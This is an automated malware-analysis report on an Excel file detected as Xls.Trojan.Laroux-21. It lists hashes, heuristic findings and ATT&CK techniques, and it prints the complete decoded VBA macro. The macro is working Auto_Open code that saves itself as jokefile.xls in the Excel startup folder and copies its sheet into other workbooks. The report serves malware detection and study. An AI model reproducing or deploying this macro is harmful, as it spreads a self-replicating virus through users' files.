Xls.Trojan.Laroux-21 Office (OLE) malware analysis — malicious · 4cc2a2518692fb34

MALICIOUS

Office (OLE)

44.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: aae4b70628f9471ba97067bec3d66cdb SHA-1: bc8f67fd6293d4eb20d04f26415703449b5dc4f4 SHA-256: 4cc2a2518692fb34f5fa69aca1b48ef9ad529f858133d4d2c5d367f467b669b3

300 Risk Score

Malware Insights

Xls.Trojan.Laroux-21 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-21. It contains an Auto_Open VBA macro that executes automatically upon opening the Excel file. This macro attempts to save the workbook as 'jokefile.xls' in the startup path and re-registers itself to run again, indicating a persistence mechanism.

Heuristics 6

ClamAV: Xls.Trojan.Laroux-21 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Laroux-21
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE

A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 19,130 bytes but its declared streams total only 0 bytes — 19,130 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS

The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3196 bytes
SHA-256: `845bb9d88b030998270ce8f23e169c3462bdc6a3ae48ef767c16e18d69b7c2f2`
Detection ClamAV: Xls.Trojan.Laroux-21 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jokefile" Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Application.OnSheetActivate = "joke" End Sub Sub joke() Attribute joke.VB_ProcData.VB_Invoke_Func = " \n14" C$ = Application.StartupPath m$ = Dir(C$ & "\" & "jokefile.xls") If m$ = "jokefile.xls" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 n4$ = ActiveWorkbook.Name ' Sheets("jokefile").Visible = True Sheets("jokefile").Select newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath 'ActiveWindow.Visible = False Workbooks(newname$).SaveAs filename:=Application.StartupPath & "\" & "jokefile.xls", FileFormat:=xlNormal ChDir c4$ Application.OnSheetActivate = "" Application.OnSheetActivate = "jokefile!joke" Case 1 'application. n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name If s$ <> "jokefile" Then Workbooks("jokefile.xls").Sheets("jokefile").Copy before:=Workbooks(n4$).Sheets(1) Else End If Application.OnSheetActivate = "" Application.OnSheetActivate = "jokefile.xls!joke" Case Else End Select End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`embedded_office_off00006746.ole`	embedded-office	Embedded OLE/CFB Office body inside ole container at offset 0x6746	19130 bytes
SHA-256: `60772d850187a91ea816d6910df03c9f226b1b3dbd71d29bdd1ba065da1e3310`

Open this report in the interactive analyzer, or submit your own file for analysis.